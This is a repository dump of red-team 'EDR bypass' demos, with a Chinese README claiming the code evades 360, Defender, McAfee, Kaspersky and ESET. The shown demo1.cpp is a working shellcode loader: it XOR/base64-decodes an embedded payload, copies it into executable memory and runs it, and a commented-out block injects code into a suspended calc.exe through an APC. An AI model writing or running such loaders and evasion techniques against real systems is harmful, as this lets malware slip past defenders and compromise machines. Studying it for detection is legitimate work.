Repository: 7BitsTeam/EDR-Bypass-demo
Branch: main
Commit: 11ea33e1a5b2
Files: 280
Total size: 471.0 KB
Directory structure:
gitextract_5ot6inlx/
├── README.md
├── chapter4-demo1/
│ ├── demo1/
│ │ ├── Debug/
│ │ │ ├── demo1.log
│ │ │ ├── demo1.obj
│ │ │ ├── demo1.obj.enc
│ │ │ ├── demo1.tlog/
│ │ │ │ ├── CL.command.1.tlog
│ │ │ │ ├── CL.read.1.tlog
│ │ │ │ ├── CL.write.1.tlog
│ │ │ │ ├── demo1.lastbuildstate
│ │ │ │ ├── link.command.1.tlog
│ │ │ │ ├── link.read.1.tlog
│ │ │ │ └── link.write.1.tlog
│ │ │ ├── vc142.idb
│ │ │ └── vc142.pdb
│ │ ├── Header.h
│ │ ├── base64.cpp
│ │ ├── base64.h
│ │ ├── demo1.cpp
│ │ ├── demo1.vcxproj
│ │ ├── demo1.vcxproj.filters
│ │ ├── demo1.vcxproj.user
│ │ └── x64/
│ │ ├── Debug/
│ │ │ ├── base64.obj
│ │ │ ├── demo1.exe.recipe
│ │ │ ├── demo1.ilk
│ │ │ ├── demo1.log
│ │ │ ├── demo1.obj
│ │ │ ├── demo1.tlog/
│ │ │ │ ├── CL.command.1.tlog
│ │ │ │ ├── CL.read.1.tlog
│ │ │ │ ├── CL.write.1.tlog
│ │ │ │ ├── demo1.lastbuildstate
│ │ │ │ ├── link.command.1.tlog
│ │ │ │ ├── link.read.1.tlog
│ │ │ │ └── link.write.1.tlog
│ │ │ ├── vc142.idb
│ │ │ ├── vc142.pdb
│ │ │ ├── vc143.idb
│ │ │ └── vc143.pdb
│ │ └── Release/
│ │ ├── base64.obj
│ │ ├── demo1.exe.recipe
│ │ ├── demo1.iobj
│ │ ├── demo1.ipdb
│ │ ├── demo1.log
│ │ ├── demo1.obj
│ │ ├── demo1.tlog/
│ │ │ ├── CL.command.1.tlog
│ │ │ ├── CL.read.1.tlog
│ │ │ ├── CL.write.1.tlog
│ │ │ ├── demo1.lastbuildstate
│ │ │ ├── link.command.1.tlog
│ │ │ ├── link.read.1.tlog
│ │ │ └── link.write.1.tlog
│ │ └── vc143.pdb
│ ├── demo1.sln
│ └── enc.py
├── chapter4-demo2/
│ ├── demo1/
│ │ ├── Debug/
│ │ │ ├── demo1.log
│ │ │ ├── demo1.obj
│ │ │ ├── demo1.obj.enc
│ │ │ ├── demo1.tlog/
│ │ │ │ ├── CL.command.1.tlog
│ │ │ │ ├── CL.read.1.tlog
│ │ │ │ ├── CL.write.1.tlog
│ │ │ │ ├── demo1.lastbuildstate
│ │ │ │ ├── link.command.1.tlog
│ │ │ │ ├── link.read.1.tlog
│ │ │ │ └── link.write.1.tlog
│ │ │ ├── vc142.idb
│ │ │ └── vc142.pdb
│ │ ├── Header.h
│ │ ├── base64.cpp
│ │ ├── base64.h
│ │ ├── demo1 - 快捷方式.lnk
│ │ ├── demo1.cpp
│ │ ├── demo1.vcxproj
│ │ ├── demo1.vcxproj.filters
│ │ ├── demo1.vcxproj.user
│ │ ├── nt.asm
│ │ ├── nt.h
│ │ └── x64/
│ │ ├── Debug/
│ │ │ ├── base64.obj
│ │ │ ├── demo1.exe.recipe
│ │ │ ├── demo1.ilk
│ │ │ ├── demo1.log
│ │ │ ├── demo1.obj
│ │ │ ├── demo1.tlog/
│ │ │ │ ├── CL.command.1.tlog
│ │ │ │ ├── CL.read.1.tlog
│ │ │ │ ├── CL.write.1.tlog
│ │ │ │ ├── demo1.lastbuildstate
│ │ │ │ ├── link.command.1.tlog
│ │ │ │ ├── link.read.1.tlog
│ │ │ │ └── link.write.1.tlog
│ │ │ ├── vc142.idb
│ │ │ ├── vc142.pdb
│ │ │ ├── vc143.idb
│ │ │ └── vc143.pdb
│ │ └── Release/
│ │ ├── base64.obj
│ │ ├── demo1.exe.recipe
│ │ ├── demo1.iobj
│ │ ├── demo1.ipdb
│ │ ├── demo1.log
│ │ ├── demo1.obj
│ │ ├── demo1.tlog/
│ │ │ ├── CL.command.1.tlog
│ │ │ ├── CL.read.1.tlog
│ │ │ ├── CL.write.1.tlog
│ │ │ ├── Masm.read.1u.tlog
│ │ │ ├── Masm.write.1u.tlog
│ │ │ ├── demo1.lastbuildstate
│ │ │ ├── link.command.1.tlog
│ │ │ ├── link.read.1.tlog
│ │ │ └── link.write.1.tlog
│ │ ├── nt.obj
│ │ └── vc143.pdb
│ ├── demo1.sln
│ └── enc.py
├── chapter4-demo3/
│ ├── demo1/
│ │ ├── Debug/
│ │ │ ├── demo1.log
│ │ │ ├── demo1.obj
│ │ │ ├── demo1.obj.enc
│ │ │ ├── demo1.tlog/
│ │ │ │ ├── CL.command.1.tlog
│ │ │ │ ├── CL.read.1.tlog
│ │ │ │ ├── CL.write.1.tlog
│ │ │ │ ├── demo1.lastbuildstate
│ │ │ │ ├── link.command.1.tlog
│ │ │ │ ├── link.read.1.tlog
│ │ │ │ └── link.write.1.tlog
│ │ │ ├── vc142.idb
│ │ │ └── vc142.pdb
│ │ ├── Header.h
│ │ ├── base64.cpp
│ │ ├── base64.h
│ │ ├── demo1 - 快捷方式.lnk
│ │ ├── demo1.cpp
│ │ ├── demo1.vcxproj
│ │ ├── demo1.vcxproj.filters
│ │ ├── demo1.vcxproj.user
│ │ ├── nt.asm
│ │ ├── nt.h
│ │ └── x64/
│ │ ├── Debug/
│ │ │ ├── base64.obj
│ │ │ ├── demo1.exe.recipe
│ │ │ ├── demo1.ilk
│ │ │ ├── demo1.log
│ │ │ ├── demo1.obj
│ │ │ ├── demo1.tlog/
│ │ │ │ ├── CL.command.1.tlog
│ │ │ │ ├── CL.read.1.tlog
│ │ │ │ ├── CL.write.1.tlog
│ │ │ │ ├── demo1.lastbuildstate
│ │ │ │ ├── link.command.1.tlog
│ │ │ │ ├── link.read.1.tlog
│ │ │ │ └── link.write.1.tlog
│ │ │ ├── vc142.idb
│ │ │ ├── vc142.pdb
│ │ │ ├── vc143.idb
│ │ │ └── vc143.pdb
│ │ └── Release/
│ │ ├── base64.obj
│ │ ├── demo1.exe.recipe
│ │ ├── demo1.iobj
│ │ ├── demo1.ipdb
│ │ ├── demo1.log
│ │ ├── demo1.tlog/
│ │ │ ├── CL.command.1.tlog
│ │ │ ├── CL.read.1.tlog
│ │ │ ├── CL.write.1.tlog
│ │ │ ├── Masm.read.1u.tlog
│ │ │ ├── Masm.write.1u.tlog
│ │ │ ├── demo1.lastbuildstate
│ │ │ ├── link.command.1.tlog
│ │ │ ├── link.read.1.tlog
│ │ │ ├── link.write.1.tlog
│ │ │ └── unsuccessfulbuild
│ │ ├── nt.obj
│ │ └── vc143.pdb
│ └── demo1.sln
├── chapter4-demo4/
│ ├── CODE_OF_CONDUCT.md
│ ├── LICENSE.txt
│ ├── README.md
│ ├── ShellcodeFluctuation/
│ │ ├── ShellcodeFluctuation.vcxproj
│ │ ├── ShellcodeFluctuation.vcxproj.filters
│ │ ├── ShellcodeFluctuation.vcxproj.user
│ │ ├── base64.cpp
│ │ ├── base64.h
│ │ ├── header.h
│ │ ├── main.cpp
│ │ └── x64/
│ │ ├── Debug/
│ │ │ ├── Shellcod.9eed9e19.tlog/
│ │ │ │ ├── CL.command.1.tlog
│ │ │ │ ├── CL.read.1.tlog
│ │ │ │ ├── CL.write.1.tlog
│ │ │ │ ├── ShellcodeFluctuation.lastbuildstate
│ │ │ │ ├── link.command.1.tlog
│ │ │ │ ├── link.read.1.tlog
│ │ │ │ └── link.write.1.tlog
│ │ │ ├── ShellcodeFluctuation.exe.recipe
│ │ │ ├── ShellcodeFluctuation.ilk
│ │ │ ├── ShellcodeFluctuation.log
│ │ │ ├── base64.obj
│ │ │ ├── main.obj
│ │ │ ├── vc143.idb
│ │ │ └── vc143.pdb
│ │ └── Release/
│ │ ├── Shellcod.9eed9e19.tlog/
│ │ │ ├── CL.command.1.tlog
│ │ │ ├── CL.read.1.tlog
│ │ │ ├── CL.write.1.tlog
│ │ │ ├── ShellcodeFluctuation.lastbuildstate
│ │ │ ├── link.command.1.tlog
│ │ │ ├── link.read.1.tlog
│ │ │ └── link.write.1.tlog
│ │ ├── ShellcodeFluctuation.exe.recipe
│ │ ├── ShellcodeFluctuation.iobj
│ │ ├── ShellcodeFluctuation.ipdb
│ │ ├── ShellcodeFluctuation.log
│ │ ├── base64.obj
│ │ ├── main.obj
│ │ └── vc143.pdb
│ ├── ShellcodeFluctuation.sln
│ └── x64/
│ ├── Debug/
│ │ └── ShellcodeFluctuation.pdb
│ └── Release/
│ └── ShellcodeFluctuation.pdb
├── demo1/
│ ├── README.md
│ └── shellcode_execute/
│ └── shellcode_execute/
│ ├── shellcode_execute/
│ │ ├── resource.h
│ │ ├── shellcode_execute.aps
│ │ ├── shellcode_execute.cpp
│ │ ├── shellcode_execute.rc
│ │ ├── shellcode_execute.vcxproj
│ │ ├── shellcode_execute.vcxproj.filters
│ │ └── shellcode_execute.vcxproj.user
│ └── shellcode_execute.sln
├── demo2/
│ ├── README.md
│ └── shellcode_execut3/
│ ├── shellcode_execut3/
│ │ ├── App.config
│ │ ├── Program.cs
│ │ ├── Properties/
│ │ │ └── AssemblyInfo.cs
│ │ └── shellcode_execut3.csproj
│ └── shellcode_execut3.sln
├── demo3/
│ ├── README.md
│ └── SharpInjector-master/
│ ├── .gitignore
│ ├── README.md
│ ├── ScEncryptor/
│ │ ├── App.config
│ │ ├── Program.cs
│ │ ├── Properties/
│ │ │ └── AssemblyInfo.cs
│ │ └── ScEncryptor.csproj
│ ├── SharpInjector/
│ │ ├── App.config
│ │ ├── CreateFiber.cs
│ │ ├── CreateRemoteThread.cs
│ │ ├── CreateRemoteThreadEx.cs
│ │ ├── CreateThread.cs
│ │ ├── EtwpCreateEtwThread.cs
│ │ ├── Program.cs
│ │ ├── Properties/
│ │ │ ├── AssemblyInfo.cs
│ │ │ ├── Resource1.Designer.cs
│ │ │ └── Resource1.resx
│ │ ├── QueueUserAPC.cs
│ │ ├── RtlCreateUserThread.cs
│ │ ├── SharpInjector.csproj
│ │ ├── Shellycode.cs
│ │ └── WinAPI.cs
│ └── SharpInjector.sln
├── demo4/
│ └── syscall/
│ ├── syscall/
│ │ ├── Syscall.asm
│ │ ├── syscall.vcxproj
│ │ ├── syscall.vcxproj.filters
│ │ ├── syscall.vcxproj.user
│ │ ├── syscall_call.cpp
│ │ └── x64/
│ │ └── Debug/
│ │ ├── Syscall.obj
│ │ ├── syscall.exe.recipe
│ │ ├── syscall.ilk
│ │ ├── syscall.log
│ │ ├── syscall.tlog/
│ │ │ ├── CL.command.1.tlog
│ │ │ ├── CL.read.1.tlog
│ │ │ ├── CL.write.1.tlog
│ │ │ ├── Masm.read.1u.tlog
│ │ │ ├── Masm.write.1u.tlog
│ │ │ ├── link.command.1.tlog
│ │ │ ├── link.read.1.tlog
│ │ │ ├── link.write.1.tlog
│ │ │ └── syscall.lastbuildstate
│ │ ├── syscall_call.obj
│ │ ├── vc143.idb
│ │ └── vc143.pdb
│ └── syscall.sln
├── demo5/
│ └── syscall3/
│ ├── syscall3/
│ │ ├── 1-asm.x64.asm
│ │ ├── 1.cpp
│ │ ├── 1.h
│ │ ├── syscall3.cpp
│ │ ├── syscall3.vcxproj
│ │ ├── syscall3.vcxproj.filters
│ │ └── syscall3.vcxproj.user
│ └── syscall3.sln
└── demo6/
├── unhook_demo/
│ ├── Header.h
│ ├── unhook_demo.cpp
│ ├── unhook_demo.vcxproj
│ ├── unhook_demo.vcxproj.filters
│ └── unhook_demo.vcxproj.user
└── unhook_demo.sln
================================================
FILE CONTENTS
================================================
================================================
FILE: README.md
================================================
# EDR-Bypass-demo
Some demos to bypass EDRs or AVs by 78itsT3@m
## 本文为7bits系列文章《红队开发基础-基础免杀》的示例代码
### 欢迎关注我们的公众号 - Zbits2022

### demo 1-3 为《红队开发基础-基础免杀(一)》的内容
- demo1:
c++代码,使用disableETW,shellcode加密,隐藏导入表的免杀方式对shellcode进行免杀
- demo2:
c#代码,使用字符串加密、异或加密、沙箱绕过方式进行bypass AV。
- demo3:
c#代码,优化demo2的shellcode加载方式,修改SharpInjector,使用EtwpCreateEtwThread加载shellcode。
### demo 4-5 为《红队开发基础-基础免杀(二)》的内容
- demo4:
c++代码,最简单的syscall例子
- demo5:
c++代码,使用SysWhispers3的jump方法,绕过对syscall的静态检查
### demo 6 为《红队开发基础-基础免杀(三)》的内容
- demo6:
c++代码,修改RefleXXion使其对user32.dll进行unhook。
### chapter4 demo1-4为《红队开发基础-基础免杀(四)》的内容
下面的例子均是忽略流量特征的情况:
- demo1:base64+xor混淆shellcode,过360,火绒。


- demo2:加强了静态混淆,过Defender,麦咖啡。


- demo3:加入syscall及apc调用方式,过卡巴斯基edr

- demo4:加入beacon的内存加密,过eset edr

================================================
FILE: chapter4-demo1/demo1/Debug/demo1.log
================================================
demo1.vcxproj -> E:\7bits_demo\demo1\demo1\Debug\demo1.exe
================================================
FILE: chapter4-demo1/demo1/Debug/demo1.tlog/demo1.lastbuildstate
================================================
#TargetFrameworkVersion=v4.0:PlatformToolSet=v142:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0
Debug|Win32|E:\7bits_demo\demo1\demo1\|
================================================
FILE: chapter4-demo1/demo1/Header.h
================================================
#pragma once
// Single-byte XOR key shared by the encoder (enc.py: i ^ 8) and the loader
// (demo1.cpp: byte ^ XOR_KEY). Changing one side without the other breaks
// decoding.
const int XOR_KEY{ 8 };
================================================
FILE: chapter4-demo1/demo1/base64.cpp
================================================
/*
base64.cpp and base64.h
base64 encoding and decoding with C++.
More information at
https://renenyffenegger.ch/notes/development/Base64/Encoding-and-decoding-base-64-with-cpp
Version: 2.rc.08 (release candidate)
Copyright (C) 2004-2017, 2020, 2021 René Nyffenegger
This source code is provided 'as-is', without any express or implied
warranty. In no event will the author be held liable for any damages
arising from the use of this software.
Permission is granted to anyone to use this software for any purpose,
including commercial applications, and to alter it and redistribute it
freely, subject to the following restrictions:
1. The origin of this source code must not be misrepresented; you must not
claim that you wrote the original source code. If you use this source code
in a product, an acknowledgment in the product documentation would be
appreciated but is not required.
2. Altered source versions must be plainly marked as such, and must not be
misrepresented as being the original source code.
3. This notice may not be removed or altered from any source distribution.
René Nyffenegger rene.nyffenegger@adp-gmbh.ch
*/
#include "base64.h"
#include <algorithm>
#include <stdexcept>
//
// Depending on the url parameter in base64_chars, one of
// two sets of base64 characters needs to be chosen.
// They differ in their last two characters.
//
// Index 0: the standard alphabet ending in "+/"; index 1: the URL-safe
// alphabet ending in "-_". Both share the first 62 symbols, so a bool `url`
// can select between them by subscripting.
static const char* base64_chars[2] = {
    "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    "abcdefghijklmnopqrstuvwxyz"
    "0123456789"
    "+/",
    "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    "abcdefghijklmnopqrstuvwxyz"
    "0123456789"
    "-_" };
static unsigned int pos_of_char(const unsigned char chr) {
    //
    // Map a single alphabet character back to its 6-bit value.
    // Both alphabets are accepted for the last two positions
    // ('+' or '-' -> 62, '/' or '_' -> 63); anything else is
    // rejected with std::runtime_error.
    //
    constexpr unsigned int kUpperCount = 'Z' - 'A' + 1;   // 26
    constexpr unsigned int kLowerCount = 'z' - 'a' + 1;   // 26
    const bool is_upper = chr >= 'A' && chr <= 'Z';
    const bool is_lower = chr >= 'a' && chr <= 'z';
    const bool is_digit = chr >= '0' && chr <= '9';
    if (is_upper) return chr - 'A';
    if (is_lower) return kUpperCount + (chr - 'a');
    if (is_digit) return kUpperCount + kLowerCount + (chr - '0');
    switch (chr) {
    case '+':
    case '-':
        return 62;
    case '/':
    case '_':
        return 63;
    default:
        //
        // 2020-10-23: Throw std::exception rather than const char*
        // (Pablo Martin-Gomez, https://github.com/Bouska)
        //
        throw std::runtime_error("Input is not valid base64-encoded data.");
    }
}
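static std::string insert_linebreaks(std::string str, size_t distance) {
    //
    // Provided by https://github.com/JomaCorpFX, adapted by me.
    //
    // Return `str` with a '\n' after every `distance` characters. No newline
    // is appended after the final (possibly short) line, and an empty input
    // yields "". A `distance` of 0 is treated as "no line breaks": the
    // original insert loop never terminated for that value, because each
    // inserted '\n' grew the string exactly as fast as the cursor advanced.
    //
    if (str.empty() || distance == 0) {
        return str;
    }
    std::string out;
    out.reserve(str.size() + str.size() / distance);   // room for the newlines
    for (size_t start = 0; start < str.size(); start += distance) {
        if (start != 0) {
            out.push_back('\n');
        }
        out.append(str, start, distance);   // append() clamps the last, shorter line
    }
    return out;
}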
template <typename String, unsigned int line_length>
static std::string encode_with_line_breaks(String s) {
return insert_linebreaks(base64_encode(s, false), line_length);
}
template <typename String>
static std::string encode_pem(String s) {
    // PEM convention: 64 characters per line.
    constexpr unsigned int kPemLineLength = 64;
    return encode_with_line_breaks<String, kPemLineLength>(s);
}
template <typename String>
static std::string encode_mime(String s) {
    // MIME convention: 76 characters per line.
    constexpr unsigned int kMimeLineLength = 76;
    return encode_with_line_breaks<String, kMimeLineLength>(s);
}
template <typename String>
static std::string encode(String s, bool url) {
return base64_encode(reinterpret_cast<const unsigned char*>(s.data()), s.length(), url);
}
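std::string base64_encode(unsigned char const* bytes_to_encode, size_t in_len, bool url) {
    //
    // Encode `in_len` raw bytes. `url` selects the URL-safe alphabet (last two
    // symbols '-' and '_') and, in this implementation, '.' instead of '=' as
    // the padding character. Every 3 input bytes become 4 output characters;
    // a 1- or 2-byte tail is padded up to 4. Returns "" for in_len == 0.
    //
    const size_t len_encoded = (in_len + 2) / 3 * 4;
    const unsigned char trailing_char = url ? '.' : '=';
    //
    // A bool is guaranteed to convert to 0 or 1, so `url` directly
    // subscripts the two-alphabet table.
    //
    const char* base64_chars_ = base64_chars[url];
    std::string ret;
    ret.reserve(len_encoded);
    //
    // `pos` has the same type as in_len. The previous `unsigned int` index
    // wrapped around for inputs of 4 GiB or more, so the loop never ended.
    //
    for (size_t pos = 0; pos < in_len; pos += 3) {
        const unsigned char b0 = bytes_to_encode[pos];
        ret.push_back(base64_chars_[(b0 & 0xfc) >> 2]);
        if (pos + 1 >= in_len) {
            // 1-byte tail: two symbols followed by two padding characters.
            ret.push_back(base64_chars_[(b0 & 0x03) << 4]);
            ret.push_back(trailing_char);
            ret.push_back(trailing_char);
            continue;
        }
        const unsigned char b1 = bytes_to_encode[pos + 1];
        ret.push_back(base64_chars_[((b0 & 0x03) << 4) + ((b1 & 0xf0) >> 4)]);
        if (pos + 2 >= in_len) {
            // 2-byte tail: three symbols followed by one padding character.
            ret.push_back(base64_chars_[(b1 & 0x0f) << 2]);
            ret.push_back(trailing_char);
            continue;
        }
        const unsigned char b2 = bytes_to_encode[pos + 2];
        ret.push_back(base64_chars_[((b1 & 0x0f) << 2) + ((b2 & 0xc0) >> 6)]);
        ret.push_back(base64_chars_[b2 & 0x3f]);
    }
    return ret;
}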
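template <typename String>
static std::string decode(String encoded_string, bool remove_linebreaks) {
    //
    // decode(...) is templated so that it can be used with String = const std::string&
    // or std::string_view (requires at least C++17).
    //
    // Both alphabets and both padding characters ('=' and '.') are accepted,
    // and padding may be omitted altogether (RFC 2045 permits that). Any
    // symbol outside the alphabet, or a dangling single symbol at the end of
    // the input, is reported with std::runtime_error.
    //
    if (encoded_string.empty()) return std::string();
    if (remove_linebreaks) {
        std::string copy(encoded_string);
        copy.erase(std::remove(copy.begin(), copy.end(), '\n'), copy.end());
        return base64_decode(copy, false);
    }
    const size_t length_of_string = encoded_string.length();
    //
    // length/4*3 is the exact decoded size for complete, unpadded input and an
    // over-estimate by one or two bytes otherwise; it is only used to reserve
    // capacity.
    //
    std::string ret;
    ret.reserve(length_of_string / 4 * 3);
    // Padding may be '=' (standard) or '.' (this library's URL-safe variant).
    const auto is_padding = [](unsigned char c) { return c == '=' || c == '.'; };
    //
    // Walk the input in chunks of four symbols. Every complete chunk yields
    // three bytes; a shorter or padded final chunk yields one or two.
    //
    for (size_t pos = 0; pos < length_of_string; pos += 4) {
        //
        // One output byte needs two symbols. The previous version read
        // encoded_string[pos + 1] unconditionally: std::string returned its
        // terminating '\0' (which pos_of_char then rejected), but
        // std::string_view has no terminator, so that read was out of bounds.
        // Reject the dangling symbol explicitly instead.
        //
        if (pos + 1 >= length_of_string) {
            throw std::runtime_error("Input is not valid base64-encoded data.");
        }
        const unsigned int pos_of_char_1 = pos_of_char(encoded_string[pos + 1]);
        // First byte: the 6 bits of symbol 0 and the top 2 bits of symbol 1.
        ret.push_back(static_cast<std::string::value_type>(
            (pos_of_char(encoded_string[pos + 0]) << 2) + ((pos_of_char_1 & 0x30) >> 4)));
        // Second byte only if symbol 2 exists and is not padding.
        if (pos + 2 >= length_of_string || is_padding(encoded_string[pos + 2])) {
            continue;
        }
        const unsigned int pos_of_char_2 = pos_of_char(encoded_string[pos + 2]);
        ret.push_back(static_cast<std::string::value_type>(
            ((pos_of_char_1 & 0x0f) << 4) + ((pos_of_char_2 & 0x3c) >> 2)));
        // Third byte only if symbol 3 exists and is not padding.
        if (pos + 3 >= length_of_string || is_padding(encoded_string[pos + 3])) {
            continue;
        }
        ret.push_back(static_cast<std::string::value_type>(
            ((pos_of_char_2 & 0x03) << 6) + pos_of_char(encoded_string[pos + 3])));
    }
    return ret;
}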
std::string base64_decode(std::string const& s, bool remove_linebreaks) {
    // Public std::string entry point; all the work happens in the decode() template.
    std::string decoded = decode(s, remove_linebreaks);
    return decoded;
}
std::string base64_encode(std::string const& s, bool url) {
    // Public std::string entry point; defers to the templated encode().
    std::string encoded = encode(s, url);
    return encoded;
}
std::string base64_encode_pem(std::string const& s) {
    // PEM-style output (64-character lines) for a std::string.
    std::string encoded = encode_pem(s);
    return encoded;
}
std::string base64_encode_mime(std::string const& s) {
    // MIME-style output (76-character lines) for a std::string.
    std::string encoded = encode_mime(s);
    return encoded;
}
#if __cplusplus >= 201703L
//
// Interface with std::string_view rather than const std::string&
// Requires C++17
// Provided by Yannic Bonenberger (https://github.com/Yannic)
//
std::string base64_encode(std::string_view s, bool url) {
    // C++17 std::string_view entry point; shares the templated encode() with
    // the std::string overload.
    std::string encoded = encode(s, url);
    return encoded;
}
std::string base64_encode_pem(std::string_view s) {
    // C++17 std::string_view entry point for PEM-style (64-character) lines.
    std::string encoded = encode_pem(s);
    return encoded;
}
std::string base64_encode_mime(std::string_view s) {
    // C++17 std::string_view entry point for MIME-style (76-character) lines.
    std::string encoded = encode_mime(s);
    return encoded;
}
std::string base64_decode(std::string_view s, bool remove_linebreaks) {
    // C++17 std::string_view entry point; shares the templated decode() with
    // the std::string overload.
    std::string decoded = decode(s, remove_linebreaks);
    return decoded;
}
#endif // __cplusplus >= 201703L
================================================
FILE: chapter4-demo1/demo1/base64.h
================================================
//
// base64 encoding and decoding with C++.
// Version: 2.rc.08 (release candidate)
//
#ifndef BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A
#define BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A
#include <string>
#if __cplusplus >= 201703L
#include <string_view>
#endif // __cplusplus >= 201703L
std::string base64_encode(std::string const& s, bool url = false);
std::string base64_encode_pem(std::string const& s);
std::string base64_encode_mime(std::string const& s);
std::string base64_decode(std::string const& s, bool remove_linebreaks = false);
std::string base64_encode(unsigned char const*, size_t len, bool url = false);
#if __cplusplus >= 201703L
//
// Interface with std::string_view rather than const std::string&
// Requires C++17
// Provided by Yannic Bonenberger (https://github.com/Yannic)
//
std::string base64_encode(std::string_view s, bool url = false);
std::string base64_encode_pem(std::string_view s);
std::string base64_encode_mime(std::string_view s);
std::string base64_decode(std::string_view s, bool remove_linebreaks = false);
#endif // __cplusplus >= 201703L
#endif /* BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A */
================================================
FILE: chapter4-demo1/demo1/demo1.cpp
================================================
// demo1.cpp : This file contains the 'main' function. Program execution begins and ends there.
//
#include <iostream>
#include <windows.h>
#include "header.h"
#include "base64.h"
using namespace std;
// Read the whole file `fnamSc` into a heap buffer and XOR every byte with
// XOR_KEY (Header.h). On success returns the decoded buffer (the caller owns
// it) and stores the file size in *szSc; returns nullptr if the file cannot
// be opened or read. Not called by main() in this revision.
//
// Known issues, left as they are: the file handle and the `raw` buffer are
// never released on any path; *szSc is written before ReadFile can fail, so a
// nullptr return can leave a non-zero size behind; and the SIZE_T -> DWORD
// narrowing plus the signed/unsigned loop comparison are the C4244/C4018
// warnings that x64/Debug/demo1.log records for this file.
unsigned char* ReadProcessBlob(const char* fnamSc, DWORD* szSc)
{
    DWORD szRead{ 0 };
    HANDLE hFile = CreateFileA(
        fnamSc,
        GENERIC_READ,
        NULL,                   // no share mode
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );
    if (INVALID_HANDLE_VALUE == hFile)
        return nullptr;
    SIZE_T szFile = GetFileSize(hFile, NULL);
    *szSc = szFile;                         // SIZE_T narrowed to DWORD (C4244)
    unsigned char* raw = new unsigned char[szFile];
    unsigned char* sc = new unsigned char[szFile];
    if (!ReadFile(hFile, raw, szFile, &szRead, NULL))   // szFile narrowed again (C4244); hFile/raw leak here
        return nullptr;
    int i;
    for (i = 0; i < szRead; i++) {          // int compared with DWORD (C4018)
        sc[i] = raw[i] ^ XOR_KEY;
    }
    return sc;                              // hFile and raw are never freed
}
// Entry point. Base64-decodes the embedded blob (its literal is redacted in
// this listing), XORs each byte with XOR_KEY — the inverse of enc.py — copies
// the result into a freshly allocated PAGE_EXECUTE_READWRITE region and
// transfers control to it through a plain function-pointer call.
//
// Points an analyst reading this sample should note: the VirtualAlloc result
// is used without a null check, the RWX allocation plus the call into
// non-image memory is the behaviour memory-scanning detections key on, and
// `all_tests_passed` is assigned but never read. The two commented-out
// blocks below are alternative launch paths; the second references `szSc`,
// which is not defined in main(). main() has no explicit return statement
// (C++ implicitly returns 0).
int main()
{
    bool all_tests_passed = false;
    std::string rest2_reference = "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";
    std::string rest2_decoded = base64_decode(rest2_reference);
    const char* S = rest2_decoded.c_str();
    unsigned char* sc = new unsigned char[rest2_decoded.length()];
    for (int i = 0; i < rest2_decoded.length(); i++) {
        sc[i] = S[i] ^ XOR_KEY;             // undo enc.py's i ^ 8
    }
    void * exec = VirtualAlloc(0, rest2_decoded.length(), MEM_COMMIT, PAGE_EXECUTE_READWRITE);   // unchecked; nullptr on failure
    memcpy(exec, sc, rest2_decoded.length());
    //unsigned const char* S=
    ((void(*)())exec)();                    // control never returns here if the payload does not return
    /*
    CreateThread
    HANDLE hThread = CreateThread(
    NULL,
    0,
    (LPTHREAD_START_ROUTINE)exec,
    NULL,
    0,
    NULL);
    if (hThread == NULL)
    {
    return 1;
    }
    WaitForSingleObject(hThread, INFINITE);
    CloseHandle(hThread);
    */
    /*
    eariler bird APC
    SIZE_T shellSize = szSc;
    STARTUPINFOA si = { 0 };
    PROCESS_INFORMATION pi = { 0 };
    CreateProcessA("C:\\Windows\\System32\\calc.exe", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
    HANDLE victimProcess = pi.hProcess;
    HANDLE threadHandle = pi.hThread;
    LPVOID shellAddress = VirtualAllocEx(victimProcess, NULL, shellSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    PTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)shellAddress;
    WriteProcessMemory(victimProcess, shellAddress, S, shellSize, NULL);
    QueueUserAPC((PAPCFUNC)apcRoutine, threadHandle, NULL);
    ResumeThread(threadHandle);
    */
}
// Run program: Ctrl + F5 or Debug > Start Without Debugging menu
// Debug program: F5 or Debug > Start Debugging menu
// Tips for Getting Started:
// 1. Use the Solution Explorer window to add/manage files
// 2. Use the Team Explorer window to connect to source control
// 3. Use the Output window to see build output and other messages
// 4. Use the Error List window to view errors
// 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project
// 6. In the future, to open this project again, go to File > Open > Project and select the .sln file
================================================
FILE: chapter4-demo1/demo1/demo1.vcxproj
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<ProjectGuid>{1876F365-2DEC-42C9-B80E-B631B26FCAD8}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>demo1</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
